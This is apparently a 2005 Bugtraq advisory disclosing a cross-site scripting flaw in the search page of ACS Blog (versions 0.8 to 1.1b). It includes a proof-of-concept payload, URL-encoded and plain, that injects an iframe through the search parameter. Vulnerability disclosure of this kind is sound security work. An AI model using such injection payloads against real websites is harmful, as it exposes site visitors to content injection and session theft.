[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    XSS in ACS blog
From:       farhad koosha <farhadkey () yahoo ! com>
Date:       2005-03-17 8:24:01
Message-ID: 20050317082401.8600.qmail () www ! securityfocus ! com
[Download RAW message or body]



XSS vulnerability exist in the ACS blog ( ASP WEBLOG SYSTEM ).

Vulnerable :

ACS Blog v 0.8
ACS Blog v 0.9
ACS Blog v 1.0
ACS Blog v 1.1b

Code :

/search.asp?search=%22%3Cbr%3E%3Ciframe+src%3D%22http%3A%2F%2Fgoogle.com%22%3E%3C%2Fiframe%3E

or goto /search.asp and copy this code :
"<br><iframe src="http://google.com"></iframe>

Vendor URL : http://www.asppress.com

[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic